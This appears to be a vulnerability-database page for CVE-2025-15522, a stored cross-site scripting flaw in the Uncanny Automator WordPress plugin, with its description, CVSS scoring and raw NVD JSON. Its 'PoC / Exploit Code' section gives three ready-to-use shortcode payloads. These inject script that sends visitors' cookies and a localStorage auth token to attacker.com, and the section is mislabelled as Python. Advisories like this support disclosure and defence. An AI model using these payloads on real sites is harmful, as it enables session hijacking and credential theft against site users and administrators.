Security Vulnerability Report
中文
CVE-2025-15522 CVSS 6.4 MEDIUM

CVE-2025-15522

Published: 2026-01-23 05:16:21
Last Modified: 2026-04-15 00:35:42

Description

The Uncanny Automator – Easy Automation, Integration, Webhooks & Workflow Builder Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automator_discord_user_mapping shortcode in all versions up to, and including, 6.10.0.2 due to insufficient input sanitization and output escaping on the verified_message parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user with a verified Discord account accesses the injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Uncanny Automator插件 < 6.10.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- WordPress Shortcode XSS PoC for CVE-2025-15522 --> <!-- Requires Contributor-level access or higher --> [automator_discord_user_mapping] verified_message="<script>alert('XSS - CVE-2025-15522');document.location='https://attacker.com/steal?cookie='+document.cookie</script>" [/automator_discord_user_mapping] <!-- Alternative PoC with img onerror --> [automator_discord_user_mapping] verified_message="<img src=x onerror='fetch(\"https://attacker.com/api/steal?data=\"+btoa(document.cookie))'/>" [/automator_discord_user_mapping] <!-- Steal admin credentials --> [automator_discord_user_mapping] verified_message="<script>fetch('https://attacker.com/log?c='+btoa(JSON.stringify({cookies:document.cookie,localStorage:localStorage.getItem('wp_auth')})));</script>" [/automator_discord_user_mapping]

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15522", "sourceIdentifier": "[email protected]", "published": "2026-01-23T05:16:21.043", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Uncanny Automator – Easy Automation, Integration, Webhooks & Workflow Builder Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automator_discord_user_mapping shortcode in all versions up to, and including, 6.10.0.2 due to insufficient input sanitization and output escaping on the verified_message parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user with a verified Discord account accesses the injected page."}, {"lang": "es", "value": "El plugin The Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin para WordPress es vulnerable a cross-site scripting almacenado a través del shortcode automator_discord_user_mapping en todas las versiones hasta la, e incluyendo, 6.10.0.2 debido a una sanitización de entrada y escape de salida insuficientes en el parámetro verified_message. Esto permite que atacantes autenticados, con acceso de nivel Colaborador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario con una cuenta de Discord verificada acceda a la página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/uncanny-automator/tags/6.10.0.2/src/integrations/discord/shortcodes/discord-user-mapping-shortcode.php#L128", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3440408/uncanny-automator/trunk/src/integrations/discord/shortcodes/discord-user-mapping-shortcode.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/uncanny-automator", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/41c54e1b-69b9-4594-8f1e-7ef17f120791?source=cve", "source": "[email protected]"}]}}